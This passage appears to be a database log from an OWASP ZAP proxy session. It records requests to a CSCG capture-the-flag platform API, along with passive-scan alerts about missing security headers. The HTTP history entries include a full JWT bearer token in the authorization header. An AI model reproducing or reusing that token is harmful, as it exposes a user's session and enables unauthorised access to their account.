VALUES(3,'api.cscg.live:444','header','Alt-Svc',19,'','h3=":443"; ma=2592000') -COMMIT -DELETE FROM PARAM WHERE PARAMID=4 AND SITE='api.cscg.live:444' AND TYPE='header' AND NAME='Content-Type' AND USED=13 AND FLAGS='' AND VALS='application/grpc-web+proto' -INSERT INTO PARAM VALUES(4,'api.cscg.live:444','header','Content-Type',14,'','application/grpc-web+proto') -COMMIT -DELETE FROM PARAM WHERE PARAMID=5 AND SITE='api.cscg.live:444' AND TYPE='header' AND NAME='Server' AND USED=18 AND FLAGS='' AND VALS='Caddy' -INSERT INTO PARAM VALUES(5,'api.cscg.live:444','header','Server',19,'','Caddy') -COMMIT -DELETE FROM PARAM WHERE PARAMID=6 AND SITE='api.cscg.live:444' AND TYPE='header' AND NAME='Vary' AND USED=13 AND FLAGS='' AND VALS='Origin' -INSERT INTO PARAM VALUES(6,'api.cscg.live:444','header','Vary',14,'','Origin') -COMMIT -DELETE FROM PARAM WHERE PARAMID=7 AND SITE='api.cscg.live:444' AND TYPE='header' AND NAME='Date' AND USED=18 AND FLAGS='' AND VALS='Sat%2C 02 Mar 2024 02:34:56 GMT,Sat%2C 02 Mar 2024 02:35:02 GMT,Sat%2C 02 Mar 2024 02:35:04 GMT,Sat%2C 02 Mar 2024 02:35:12 GMT,Sat%2C 02 Mar 2024 02:35:06 GMT,Sat%2C 02 Mar 2024 02:34:58 GMT,Sat%2C 02 Mar 2024 02:35:08 GMT,Sat%2C 02 Mar 2024 02:35:03 GMT,Sat%2C 02 Mar 2024 02:34:57 GMT,Sat%2C 02 Mar 2024 02:34:55 GMT,Sat%2C 02 Mar 2024 02:35:01 GMT,Sat%2C 02 Mar 2024 02:35:16 GMT,Sat%2C 02 Mar 2024 02:35:14 GMT,Sat%2C 02 Mar 2024 02:35:11 GMT,Sat%2C 02 Mar 2024 02:35:18 GMT,Sat%2C 02 Mar 2024 02:35:20 GMT' -INSERT INTO PARAM VALUES(7,'api.cscg.live:444','header','Date',19,'','Sat%2C 02 Mar 2024 02:34:56 GMT,Sat%2C 02 Mar 2024 02:35:02 GMT,Sat%2C 02 Mar 2024 02:35:04 GMT,Sat%2C 02 Mar 2024 02:35:12 GMT,Sat%2C 02 Mar 2024 02:35:06 GMT,Sat%2C 02 Mar 2024 02:34:58 GMT,Sat%2C 02 Mar 2024 02:35:08 GMT,Sat%2C 02 Mar 2024 02:35:03 GMT,Sat%2C 02 Mar 2024 02:34:57 GMT,Sat%2C 02 Mar 2024 02:34:55 GMT,Sat%2C 02 Mar 2024 02:35:01 GMT,Sat%2C 02 Mar 2024 02:35:16 GMT,Sat%2C 02 Mar 2024 02:35:14 GMT,Sat%2C 02 Mar 2024 02:35:11 GMT,Sat%2C 02 Mar 2024 02:35:18 GMT,Sat%2C 02 Mar 2024 02:35:20 GMT') -COMMIT -DELETE FROM PARAM WHERE PARAMID=8 AND SITE='api.cscg.live:444' AND TYPE='header' AND NAME='content-length' AND USED=13 AND FLAGS='' AND VALS='129' -INSERT INTO PARAM VALUES(8,'api.cscg.live:444','header','content-length',14,'','129') -COMMIT -/*C1*/INSERT INTO LOB_IDS VALUES(60,552,0,40) -ALTER SEQUENCE SYSTEM_LOBS.LOB_ID RESTART WITH 61 -COMMIT -DELETE FROM BLOCKS WHERE BLOCK_ADDR=59 -INSERT INTO BLOCKS VALUES(59,1,0) -INSERT INTO BLOCKS VALUES(60,2147483587,0) -DELETE FROM BLOCKS WHERE BLOCK_ADDR=59 -INSERT INTO LOBS VALUES(59,1,0,60) -COMMIT -/*C13*/SET SCHEMA PUBLIC -INSERT INTO WEBSOCKET_MESSAGE VALUES(60,1,'2024-03-02 03:35:20.971000',1,60,NULL,552,FALSE) -SET SCHEMA SYSTEM_LOBS -DELETE FROM LOB_IDS WHERE LOB_ID=60 -INSERT INTO LOB_IDS VALUES(60,552,1,40) -COMMIT -/*C1*/INSERT INTO LOB_IDS VALUES(61,552,0,40) -ALTER SEQUENCE SYSTEM_LOBS.LOB_ID RESTART WITH 62 -COMMIT -DELETE FROM BLOCKS WHERE BLOCK_ADDR=60 -INSERT INTO BLOCKS VALUES(60,1,0) -INSERT INTO BLOCKS VALUES(61,2147483586,0) -DELETE FROM BLOCKS WHERE BLOCK_ADDR=60 -INSERT INTO LOBS VALUES(60,1,0,61) -COMMIT -/*C13*/SET SCHEMA PUBLIC -INSERT INTO WEBSOCKET_MESSAGE VALUES(61,1,'2024-03-02 03:35:20.971000',1,61,NULL,552,FALSE) -SET SCHEMA SYSTEM_LOBS -DELETE FROM LOB_IDS WHERE LOB_ID=61 -INSERT INTO LOB_IDS VALUES(61,552,1,40) -COMMIT -/*C5*/INSERT INTO ALERT VALUES(38,0,10021,'X-Content-Type-Options Header Missing',1,2,'The Anti-MIME-Sniffing header X-Content-Type-Options was not set to ''nosniff''. This allows older versions of Internet Explorer and Chrome to perform MIME-sniffing on the response body, potentially causing the response body to be interpreted and displayed as a content type other than the declared content type. Current (early 2014) and legacy versions of Firefox will use the declared content type (if one is set), rather than performing MIME-sniffing.','https://api.cscg.live:444/platform.Platform/BrokerGetSessionStatus','x-content-type-options','This issue still applies to error type pages (401, 403, 500, etc.) as those pages are often still affected by injection issues, in which case there is still concern for browsers sniffing pages away from their actual content type.\u000aAt "High" threshold this scan rule will not alert on client or server error responses.','Ensure that the application/web server sets the Content-Type header appropriately, and that it sets the X-Content-Type-Options header to ''nosniff'' for all web pages.\u000aIf possible, ensure that the end user uses a standards-compliant and modern web browser that does not perform MIME-sniffing at all, or that can be directed by the web application/web server to not perform MIME-sniffing.','https://learn.microsoft.com/en-us/previous-versions/windows/internet-explorer/ie-developer/compatibility/gg622941(v=vs.85)\u000ahttps://owasp.org/www-community/Security_Headers',24,24,'','',693,15,3,'','10021') -COMMIT -/*C6*/INSERT INTO ALERT_TAG VALUES(79,38,'OWASP_2021_A05','https://owasp.org/Top10/A05_2021-Security_Misconfiguration/') -COMMIT -INSERT INTO ALERT_TAG VALUES(80,38,'OWASP_2017_A06','https://owasp.org/www-project-top-ten/2017/A6_2017-Security_Misconfiguration.html') -COMMIT -/*C1*/INSERT INTO LOB_IDS VALUES(62,573,0,40) -ALTER SEQUENCE SYSTEM_LOBS.LOB_ID RESTART WITH 63 -COMMIT -DELETE FROM BLOCKS WHERE BLOCK_ADDR=61 -INSERT INTO BLOCKS VALUES(61,1,0) -INSERT INTO BLOCKS VALUES(62,2147483585,0) -DELETE FROM BLOCKS WHERE BLOCK_ADDR=61 -INSERT INTO LOBS VALUES(61,1,0,62) -COMMIT -/*C13*/SET SCHEMA PUBLIC -INSERT INTO WEBSOCKET_MESSAGE VALUES(62,1,'2024-03-02 03:35:20.973000',1,62,NULL,573,FALSE) -SET SCHEMA SYSTEM_LOBS -DELETE FROM LOB_IDS WHERE LOB_ID=62 -INSERT INTO LOB_IDS VALUES(62,573,1,40) -COMMIT -/*C3*/INSERT INTO HISTORY VALUES(25,1709346750724,1,200,1709346922688,508,'POST','https://api.cscg.live:444/platform.Platform/BrokerGetSessionStatus','POST https://api.cscg.live:444/platform.Platform/BrokerGetSessionStatus HTTP/1.1\u000d\u000ahost: api.cscg.live:444\u000d\u000aUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0\u000d\u000aAccept: */*\u000d\u000aAccept-Language: en-US,en;q=0.5\u000d\u000aReferer: https://play.cscg.live/\u000d\u000aauthorization: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1aWQiOiIzMDYwODYxNzY1ODUxNTQ1NjAiLCJleHAiOjE3MDk5MTMzMjh9.JpFHIOU8-a2WYlNV5ULXkK-u_99MLNy-igxO672RIuI\u000d\u000acontent-type: application/grpc-web+proto\u000d\u000ax-grpc-web: 1\u000d\u000ax-user-agent: connect-es/1.3.0\u000d\u000aContent-Length: 44\u000d\u000aOrigin: https://play.cscg.live\u000d\u000aConnection: keep-alive\u000d\u000aSec-Fetch-Dest: empty\u000d\u000aSec-Fetch-Mode: cors\u000d\u000aSec-Fetch-Site: same-site\u000d\u000a\u000d\u000a','00000000270a18373232653363613365393262363863656666353830336664120b696e74726f2d7765622d32','HTTP/1.1 200 OK\u000d\u000aAccess-Control-Allow-Origin: https://play.cscg.live\u000d\u000aAccess-Control-Expose-Headers: Access-Control-Allow-Origin, Vary, Date, Content-Type, grpc-status, grpc-message\u000d\u000aAlt-Svc: h3=":443"; ma=2592000\u000d\u000aContent-Type: application/grpc-web+proto\u000d\u000aServer: Caddy\u000d\u000aVary: Origin\u000d\u000aDate: Sat, 02 Mar 2024 02:35:23 GMT\u000d\u000acontent-length: 129\u000d\u000a\u000d\u000a','00000000670a1837323265336361336539326236386365666635383033666410011a49123d3732326533636133653932623638636566663538303366642d313032342d696e74726f2d7765622d322e6368616c6c656e67652e637363672e6c69766518b90a220568747470738000000010677270632d7374617475733a20300d0a',NULL,'',TRUE) -COMMIT -/*C1*/INSERT INTO LOB_IDS VALUES(63,323,0,40) -ALTER SEQUENCE SYSTEM_LOBS.LOB_ID RESTART WITH 64 -COMMIT -DELETE FROM BLOCKS WHERE BLOCK_ADDR=62 -INSERT INTO BLOCKS VALUES(62,1,0) -INSERT INTO BLOCKS VALUES(63,2147483584,0) -DELETE FROM BLOCKS WHERE BLOCK_ADDR=62 -INSERT INTO LOBS VALUES(62,1,0,63) -COMMIT -/*C13*/SET SCHEMA PUBLIC -INSERT INTO WEBSOCKET_MESSAGE VALUES(63,1,'2024-03-02 03:35:23.197000',1,63,NULL,323,FALSE) -SET SCHEMA SYSTEM_LOBS -DELETE FROM LOB_IDS WHERE LOB_ID=63 -INSERT INTO LOB_IDS VALUES(63,323,1,40) -COMMIT -/*C10*/DELETE FROM PARAM WHERE PARAMID=1 AND SITE='api.cscg.live:444' AND TYPE='header' AND NAME='Access-Control-Allow-Origin' AND USED=19 AND FLAGS='' AND VALS='https://play.cscg.live' -INSERT INTO PARAM VALUES(1,'api.cscg.live:444','header','Access-Control-Allow-Origin',20,'','https://play.cscg.live') -COMMIT -DELETE FROM PARAM WHERE PARAMID=2 AND SITE='api.cscg.live:444' AND TYPE='header' AND NAME='Access-Control-Expose-Headers' AND USED=14 AND FLAGS='' AND VALS='Date%2C Access-Control-Allow-Origin%2C Vary%2C Content-Type%2C grpc-status%2C grpc-message,Access-Control-Allow-Origin%2C Vary%2C Content-Type%2C Date%2C grpc-status%2C grpc-message,Access-Control-Allow-Origin%2C Vary%2C Date%2C Content-Type%2C grpc-status%2C grpc-message,Content-Type%2C Access-Control-Allow-Origin%2C Vary%2C Date%2C grpc-status%2C grpc-message,Vary%2C Date%2C Content-Type%2C Access-Control-Allow-Origin%2C grpc-status%2C grpc-message' -INSERT INTO PARAM VALUES(2,'api.cscg.live:444','header','Access-Control-Expose-Headers',15,'','Date%2C Access-Control-Allow-Origin%2C Vary%2C Content-Type%2C grpc-status%2C grpc-message,Access-Control-Allow-Origin%2C Vary%2C Content-Type%2C Date%2C grpc-status%2C grpc-message,Access-Control-Allow-Origin%2C Vary%2C Date%2C Content-Type%2C grpc-status%2C grpc-message,Content-Type%2C Access-Control-Allow-Origin%2C Vary%2C Date%2C grpc-status%2C grpc-message,Vary%2C Date%2C Content-Type%2C Access-Control-Allow-Origin%2C grpc-status%2C grpc-message') -COMMIT -DELETE FROM PARAM WHERE PARAMID=3 AND SITE='api.cscg.live:444' AND TYPE='header' AND NAME='Alt-Svc' AND USED=19 AND FLAGS='' AND VALS='h3=":443"; ma=2592000' -INSERT INTO PARAM VALUES(3,'api.cscg.live:444','header','Alt-Svc',20,'','h3=":443"; ma=2592000') -COMMIT -DELETE FROM PARAM WHERE PARAMID=4 AND SITE='api.cscg.live:444' AND TYPE='header' AND NAME='Content-Type' AND USED=14 AND FLAGS='' AND VALS='application/grpc-web+proto' -INSERT INTO PARAM VALUES(4,'api.cscg.live:444','header','Content-Type',15,'','application/grpc-web+proto') -COMMIT -DELETE FROM PARAM WHERE PARAMID=5 AND SITE='api.cscg.live:444' AND TYPE='header' AND NAME='Server' AND USED=19 AND FLAGS='' AND VALS='Caddy' -INSERT INTO PARAM VALUES(5,'api.cscg.live:444','header','Server',20,'','Caddy') -COMMIT -DELETE FROM PARAM WHERE PARAMID=6 AND SITE='api.cscg.live:444' AND TYPE='header' AND NAME='Vary' AND USED=14 AND FLAGS='' AND VALS='Origin' -INSERT INTO PARAM VALUES(6,'api.cscg.live:444','header','Vary',15,'','Origin') -COMMIT -DELETE FROM PARAM WHERE PARAMID=7 AND SITE='api.cscg.live:444' AND TYPE='header' AND NAME='Date' AND USED=19 AND FLAGS='' AND VALS='Sat%2C 02 Mar 2024 02:34:56 GMT,Sat%2C 02 Mar 2024 02:35:02 GMT,Sat%2C 02 Mar 2024 02:35:04 GMT,Sat%2C 02 Mar 2024 02:35:12 GMT,Sat%2C 02 Mar 2024 02:35:06 GMT,Sat%2C 02 Mar 2024 02:34:58 GMT,Sat%2C 02 Mar 2024 02:35:08 GMT,Sat%2C 02 Mar 2024 02:35:03 GMT,Sat%2C 02 Mar 2024 02:34:57 GMT,Sat%2C 02 Mar 2024 02:34:55 GMT,Sat%2C 02 Mar 2024 02:35:01 GMT,Sat%2C 02 Mar 2024 02:35:16 GMT,Sat%2C 02 Mar 2024 02:35:14 GMT,Sat%2C 02 Mar 2024 02:35:11 GMT,Sat%2C 02 Mar 2024 02:35:18 GMT,Sat%2C 02 Mar 2024 02:35:20 GMT' -INSERT INTO PARAM VALUES(7,'api.cscg.live:444','header','Date',20,'','Sat%2C 02 Mar 2024 02:34:56 GMT,Sat%2C 02 Mar 2024 02:35:02 GMT,Sat%2C 02 Mar 2024 02:35:04 GMT,Sat%2C 02 Mar 2024 02:35:12 GMT,Sat%2C 02 Mar 2024 02:35:06 GMT,Sat%2C 02 Mar 2024 02:35:23 GMT,Sat%2C 02 Mar 2024 02:34:58 GMT,Sat%2C 02 Mar 2024 02:35:08 GMT,Sat%2C 02 Mar 2024 02:35:03 GMT,Sat%2C 02 Mar 2024 02:34:57 GMT,Sat%2C 02 Mar 2024 02:34:55 GMT,Sat%2C 02 Mar 2024 02:35:01 GMT,Sat%2C 02 Mar 2024 02:35:16 GMT,Sat%2C 02 Mar 2024 02:35:14 GMT,Sat%2C 02 Mar 2024 02:35:11 GMT,Sat%2C 02 Mar 2024 02:35:18 GMT,Sat%2C 02 Mar 2024 02:35:20 GMT') -COMMIT -DELETE FROM PARAM WHERE PARAMID=8 AND SITE='api.cscg.live:444' AND TYPE='header' AND NAME='content-length' AND USED=14 AND FLAGS='' AND VALS='129' -INSERT INTO PARAM VALUES(8,'api.cscg.live:444','header','content-length',15,'','129') -COMMIT -/*C5*/INSERT INTO ALERT VALUES(39,0,10035,'Strict-Transport-Security Header Not Set',1,3,'HTTP Strict Transport Security (HSTS) is a web security policy mechanism whereby a web server declares that complying user agents (such as a web browser) are to interact with it using only secure HTTPS connections (i.e. HTTP layered over TLS/SSL). HSTS is an IETF standards track protocol and is specified in RFC 6797.','https://api.cscg.live:444/platform.Platform/BrokerGetSessionStatus','','','Ensure that your web server, application server, load balancer, etc. is configured to enforce Strict-Transport-Security.','https://cheatsheetseries.owasp.org/cheatsheets/HTTP_Strict_Transport_Security_Cheat_Sheet.html\u000ahttps://owasp.org/www-community/Security_Headers\u000ahttps://en.wikipedia.org/wiki/HTTP_Strict_Transport_Security\u000ahttps://caniuse.com/stricttransportsecurity\u000ahttps://datatracker.ietf.org/doc/html/rfc6797',25,25,'','',319,15,3,'','10035-1') -COMMIT -/*C6*/INSERT INTO ALERT_TAG VALUES(81,39,'OWASP_2021_A05','https://owasp.org/Top10/A05_2021-Security_Misconfiguration/') -COMMIT -INSERT INTO ALERT_TAG VALUES(82,39,'OWASP_2017_A06','https://owasp.org/www-project-top-ten/2017/A6_2017-Security_Misconfiguration.html') -COMMIT -/*C1*/INSERT INTO LOB_IDS VALUES(64,552,0,40) -ALTER SEQUENCE SYSTEM_LOBS.LOB_ID RESTART WITH 65 -COMMIT -DELETE FROM BLOCKS WHERE BLOCK_ADDR=63 -INSERT INTO BLOCKS VALUES(63,1,0) -INSERT INTO BLOCKS VALUES(64,2147483583,0) -DELETE FROM BLOCKS WHERE BLOCK_ADDR=63 -INSERT INTO LOBS VALUES(63,1,0,64) -COMMIT -/*C13*/SET SCHEMA PUBLIC -INSERT INTO WEBSOCKET_MESSAGE VALUES(64,1,'2024-03-02 03:35:23.399000',1,64,NULL,552,FALSE) -SET SCHEMA SYSTEM_LOBS -DELETE FROM LOB_IDS WHERE LOB_ID=64 -INSERT INTO LOB_IDS VALUES(64,552,1,40) -COMMIT -/*C5*/INSERT INTO ALERT VALUES(40,0,10021,'X-Content-Type-Options Header Missing',1,2,'The Anti-MIME-Sniffing header X-Content-Type-Options was not set to ''nosniff''. This allows older versions of Internet Explorer and Chrome to perform MIME-sniffing on the response body, potentially causing the response body to be interpreted and displayed as a content type other than the declared content type. Current (early 2014) and legacy versions of Firefox will use the declared content type (if one is set), rather than performing MIME-sniffing.','https://api.cscg.live:444/platform.Platform/BrokerGetSessionStatus','x-content-type-options','This issue still applies to error type pages (401, 403, 500, etc.) as those pages are often still affected by injection issues, in which case there is still concern for browsers sniffing pages away from their actual content type.\u000aAt "High" threshold this scan rule will not alert on client or server error responses.','Ensure that the application/web server sets the Content-Type header appropriately, and that it sets the X-Content-Type-Options header to ''nosniff'' for all web pages.\u000aIf possible, ensure that the end user uses a standards-compliant and modern web browser that does not perform MIME-sniffing at all, or that can be directed by the web application/web server to not perform MIME-sniffing.','https://learn.microsoft.com/en-us/previous-versions/windows/internet-explorer/ie-developer/compatibility/gg622941(v=vs.85)\u000ahttps://owasp.org/www-community/Security_Headers',25,25,'','',693,15,3,'','10021') -COMMIT -/*C6*/INSERT INTO ALERT_TAG VALUES(83,40,'OWASP_2021_A05','https://owasp.org/Top10/A05_2021-Security_Misconfiguration/') -COMMIT -INSERT INTO ALERT_TAG VALUES(84,40,'OWASP_2017_A06','https://owasp.org/www-project-top-ten/2017/A6_2017-Security_Misconfiguration.html') -COMMIT -/*C1*/INSERT INTO LOB_IDS VALUES(65,573,0,40) -ALTER SEQUENCE SYSTEM_LOBS.LOB_ID RESTART WITH 66 -COMMIT -DELETE FROM BLOCKS WHERE BLOCK_ADDR=64 -INSERT INTO BLOCKS VALUES(64,1,0) -INSERT INTO BLOCKS VALUES(65,2147483582,0) -DELETE FROM BLOCKS WHERE BLOCK_ADDR=64 -INSERT INTO LOBS VALUES(64,1,0,65) -COMMIT -/*C13*/SET SCHEMA PUBLIC -INSERT INTO WEBSOCKET_MESSAGE VALUES(65,1,'2024-03-02 03:35:23.402000',1,65,NULL,573,FALSE) -SET SCHEMA SYSTEM_LOBS -DELETE FROM LOB_IDS WHERE LOB_ID=65 -INSERT INTO LOB_IDS VALUES(65,573,1,40) -COMMIT -/*C3*/INSERT INTO HISTORY VALUES(26,1709346750724,1,200,1709346924701,311,'POST','https://api.cscg.live:444/platform.Platform/BrokerGetSessionStatus','POST https://api.cscg.live:444/platform.Platform/BrokerGetSessionStatus HTTP/1.1\u000d\u000ahost: api.cscg.live:444\u000d\u000aUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0\u000d\u000aAccept: */*\u000d\u000aAccept-Language: en-US,en;q=0.5\u000d\u000aReferer: https://play.cscg.live/\u000d\u000aauthorization: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1aWQiOiIzMDYwODYxNzY1ODUxNTQ1NjAiLCJleHAiOjE3MDk5MTMzMjh9.JpFHIOU8-a2WYlNV5ULXkK-u_99MLNy-igxO672RIuI\u000d\u000acontent-type: application/grpc-web+proto\u000d\u000ax-grpc-web: 1\u000d\u000ax-user-agent: connect-es/1.3.0\u000d\u000aContent-Length: 44\u000d\u000aOrigin: https://play.cscg.live\u000d\u000aConnection: keep-alive\u000d\u000aSec-Fetch-Dest: empty\u000d\u000aSec-Fetch-Mode: cors\u000d\u000aSec-Fetch-Site: same-site\u000d\u000a\u000d\u000a','00000000270a18373232653363613365393262363863656666353830336664120b696e74726f2d7765622d32','HTTP/1.1 200 OK\u000d\u000aAccess-Control-Allow-Origin: https://play.cscg.live\u000d\u000aAccess-Control-Expose-Headers: Access-Control-Allow-Origin, Vary, Content-Type, Date, grpc-status, grpc-message\u000d\u000aAlt-Svc: h3=":443"; ma=2592000\u000d\u000aContent-Type: application/grpc-web+proto\u000d\u000aServer: Caddy\u000d\u000aVary: Origin\u000d\u000aDate: Sat, 02 Mar 2024 02:35:24 GMT\u000d\u000acontent-length: 129\u000d\u000a\u000d\u000a','00000000670a1837323265336361336539326236386365666635383033666410011a49123d3732326533636133653932623638636566663538303366642d313032342d696e74726f2d7765622d322e6368616c6c656e67652e637363672e6c69766518b90a220568747470738000000010677270632d7374617475733a20300d0a',NULL,'',TRUE) -COMMIT -/*C1*/INSERT INTO LOB_IDS VALUES(66,323,0,40) -ALTER SEQUENCE SYSTEM_LOBS.LOB_ID RESTART WITH 67 -COMMIT -DELETE FROM BLOCKS WHERE BLOCK_ADDR=65 -INSERT INTO BLOCKS VALUES(65,1,0) -INSERT INTO BLOCKS VALUES(66,2147483581,0) -DELETE FROM BLOCKS WHERE BLOCK_ADDR=65 -INSERT INTO LOBS VALUES(65,1,0,66) -COMMIT -/*C13*/SET SCHEMA PUBLIC -INSERT INTO WEBSOCKET_MESSAGE VALUES(66,1,'2024-03-02 03:35:25.014000',1,66,NULL,323,FALSE) -SET SCHEMA SYSTEM_LOBS -DELETE FROM LOB_IDS WHERE LOB_ID=66 -INSERT INTO LOB_IDS VALUES(66,323,1,40) -COMMIT -/*C5*/INSERT INTO ALERT VALUES(41,0,10035,'Strict-Transport-Security Header Not Set',1,3,'HTTP Strict Transport Security (HSTS) is a web security policy mechanism whereby a web server declares that complying user agents (such as a web browser) are to interact with it using only secure HTTPS connections (i.e. HTTP layered over TLS/SSL). HSTS is an IETF standards track protocol and is specified in RFC 6797.','https://api.cscg.live:444/platform.Platform/BrokerGetSessionStatus','','','Ensure that your web server, application server, load balancer, etc. is configured to enforce Strict-Transport-Security.','https://cheatsheetseries.owasp.org/cheatsheets/HTTP_Strict_Transport_Security_Cheat_Sheet.html\u000ahttps://owasp.org/www-community/Security_Headers\u000ahttps://en.wikipedia.org/wiki/HTTP_Strict_Transport_Security\u000ahttps://caniuse.com/stricttransportsecurity\u000ahttps://datatracker.ietf.org/doc/html/rfc6797',26,26,'','',319,15,3,'','10035-1') -COMMIT -/*C6*/INSERT INTO ALERT_TAG VALUES(85,41,'OWASP_2021_A05','https://owasp.org/Top10/A05_2021-Security_Misconfiguration/') -COMMIT -/*C10*/DELETE FROM PARAM WHERE PARAMID=1 AND SITE='api.cscg.live:444' AND TYPE='header' AND NAME='Access-Control-Allow-Origin' AND USED=20 AND FLAGS='' AND VALS='https://play.cscg.live' -INSERT INTO PARAM VALUES(1,'api.cscg.live:444','header','Access-Control-Allow-Origin',21,'','https://play.cscg.live') -COMMIT -/*C6*/INSERT INTO ALERT_TAG VALUES(86,41,'OWASP_2017_A06','https://owasp.org/www-project-top-ten/2017/A6_2017-Security_Misconfiguration.html') -COMMIT -/*C10*/DELETE FROM PARAM WHERE PARAMID=2 AND SITE='api.cscg.live:444' AND TYPE='header' AND NAME='Access-Control-Expose-Headers' AND USED=15 AND FLAGS='' AND VALS='Date%2C Access-Control-Allow-Origin%2C Vary%2C Content-Type%2C grpc-status%2C grpc-message,Access-Control-Allow-Origin%2C Vary%2C Content-Type%2C Date%2C grpc-status%2C grpc-message,Access-Control-Allow-Origin%2C Vary%2C Date%2C Content-Type%2C grpc-status%2C grpc-message,Content-Type%2C Access-Control-Allow-Origin%2C Vary%2C Date%2C grpc-status%2C grpc-message,Vary%2C Date%2C Content-Type%2C Access-Control-Allow-Origin%2C grpc-status%2C grpc-message' -INSERT INTO PARAM VALUES(2,'api.cscg.live:444','header','Access-Control-Expose-Headers',16,'','Date%2C Access-Control-Allow-Origin%2C Vary%2C Content-Type%2C grpc-status%2C grpc-message,Access-Control-Allow-Origin%2C Vary%2C Content-Type%2C Date%2C grpc-status%2C grpc-message,Access-Control-Allow-Origin%2C Vary%2C Date%2C Content-Type%2C grpc-status%2C grpc-message,Content-Type%2C Access-Control-Allow-Origin%2C Vary%2C Date%2C grpc-status%2C grpc-message,Vary%2C Date%2C Content-Type%2C Access-Control-Allow-Origin%2C grpc-status%2C grpc-message') -COMMIT -DELETE FROM PARAM WHERE PARAMID=3 AND SITE='api.cscg.live:444' AND TYPE='header' AND NAME='Alt-Svc' AND USED=20 AND FLAGS='' AND VALS='h3=":443"; ma=2592000' -INSERT INTO PARAM VALUES(3,'api.cscg.live:444','header','Alt-Svc',21,'','h3=":443"; ma=2592000') -COMMIT -DELETE FROM PARAM WHERE PARAMID=4 AND SITE='api.cscg.live:444' AND TYPE='header' AND NAME='Content-Type' AND USED=15 AND FLAGS='' AND VALS='application/grpc-web+proto' -INSERT INTO PARAM VALUES(4,'api.cscg.live:444','header','Content-Type',16,'','application/grpc-web+proto') -COMMIT -DELETE FROM PARAM WHERE PARAMID=5 AND SITE='api.cscg.live:444' AND TYPE='header' AND NAME='Server' AND USED=20 AND FLAGS='' AND VALS='Caddy' -INSERT INTO PARAM VALUES(5,'api.cscg.live:444','header','Server',21,'','Caddy') -COMMIT -DELETE FROM PARAM WHERE PARAMID=6 AND SITE='api.cscg.live:444' AND TYPE='header' AND NAME='Vary' AND USED=15 AND FLAGS='' AND VALS='Origin' -INSERT INTO PARAM VALUES(6,'api.cscg.live:444','header','Vary',16,'','Origin') -COMMIT -DELETE FROM PARAM WHERE PARAMID=7 AND SITE='api.cscg.live:444' AND TYPE='header' AND NAME='Date' AND USED=20 AND FLAGS='' AND VALS='Sat%2C 02 Mar 2024 02:34:56 GMT,Sat%2C 02 Mar 2024 02:35:02 GMT,Sat%2C 02 Mar 2024 02:35:04 GMT,Sat%2C 02 Mar 2024 02:35:12 GMT,Sat%2C 02 Mar 2024 02:35:06 GMT,Sat%2C 02 Mar 2024 02:35:23 GMT,Sat%2C 02 Mar 2024 02:34:58 GMT,Sat%2C 02 Mar 2024 02:35:08 GMT,Sat%2C 02 Mar 2024 02:35:03 GMT,Sat%2C 02 Mar 2024 02:34:57 GMT,Sat%2C 02 Mar 2024 02:34:55 GMT,Sat%2C 02 Mar 2024 02:35:01 GMT,Sat%2C 02 Mar 2024 02:35:16 GMT,Sat%2C 02 Mar 2024 02:35:14 GMT,Sat%2C 02 Mar 2024 02:35:11 GMT,Sat%2C 02 Mar 2024 02:35:18 GMT,Sat%2C 02 Mar 2024 02:35:20 GMT' -INSERT INTO PARAM VALUES(7,'api.cscg.live:444','header','Date',21,'','Sat%2C 02 Mar 2024 02:34:56 GMT,Sat%2C 02 Mar 2024 02:35:02 GMT,Sat%2C 02 Mar 2024 02:35:04 GMT,Sat%2C 02 Mar 2024 02:35:12 GMT,Sat%2C 02 Mar 2024 02:35:06 GMT,Sat%2C 02 Mar 2024 02:35:23 GMT,Sat%2C 02 Mar 2024 02:34:58 GMT,Sat%2C 02 Mar 2024 02:35:08 GMT,Sat%2C 02 Mar 2024 02:35:03 GMT,Sat%2C 02 Mar 2024 02:34:57 GMT,Sat%2C 02 Mar 2024 02:34:55 GMT,Sat%2C 02 Mar 2024 02:35:01 GMT,Sat%2C 02 Mar 2024 02:35:16 GMT,Sat%2C 02 Mar 2024 02:35:14 GMT,Sat%2C 02 Mar 2024 02:35:11 GMT,Sat%2C 02 Mar 2024 02:35:18 GMT,Sat%2C 02 Mar 2024 02:35:24 GMT,Sat%2C 02 Mar 2024 02:35:20 GMT') -COMMIT -DELETE FROM PARAM WHERE PARAMID=8 AND SITE='api.cscg.live:444' AND TYPE='header' AND NAME='content-length' AND USED=15 AND FLAGS='' AND VALS='129' -INSERT INTO PARAM VALUES(8,'api.cscg.live:444','header','content-length',16,'','129') -COMMIT -/*C1*/INSERT INTO LOB_IDS VALUES(67,552,0,40) -ALTER SEQUENCE SYSTEM_LOBS.LOB_ID RESTART WITH 68 -COMMIT -DELETE FROM BLOCKS WHERE BLOCK_ADDR=66 -INSERT INTO BLOCKS VALUES(66,1,0) -INSERT INTO BLOCKS VALUES(67,2147483580,0) -DELETE FROM BLOCKS WHERE BLOCK_ADDR=66 -INSERT INTO LOBS VALUES(66,1,0,67) -COMMIT -/*C13*/SET SCHEMA PUBLIC -INSERT INTO WEBSOCKET_MESSAGE VALUES(67,1,'2024-03-02 03:35:25.220000',1,67,NULL,552,FALSE) -SET SCHEMA SYSTEM_LOBS -DELETE FROM LOB_IDS WHERE LOB_ID=67 -INSERT INTO LOB_IDS VALUES(67,552,1,40) -COMMIT -/*C5*/INSERT INTO ALERT VALUES(42,0,10021,'X-Content-Type-Options Header Missing',1,2,'The Anti-MIME-Sniffing header X-Content-Type-Options was not set to ''nosniff''. This allows older versions of Internet Explorer and Chrome to perform MIME-sniffing on the response body, potentially causing the response body to be interpreted and displayed as a content type other than the declared content type. Current (early 2014) and legacy versions of Firefox will use the declared content type (if one is set), rather than performing MIME-sniffing.','https://api.cscg.live:444/platform.Platform/BrokerGetSessionStatus','x-content-type-options','This issue still applies to error type pages (401, 403, 500, etc.) as those pages are often still affected by injection issues, in which case there is still concern for browsers sniffing pages away from their actual content type.\u000aAt "High" threshold this scan rule will not alert on client or server error responses.','Ensure that the application/web server sets the Content-Type header appropriately, and that it sets the X-Content-Type-Options header to ''nosniff'' for all web pages.\u000aIf possible, ensure that the end user uses a standards-compliant and modern web browser that does not perform MIME-sniffing at all, or that can be directed by the web application/web server to not perform 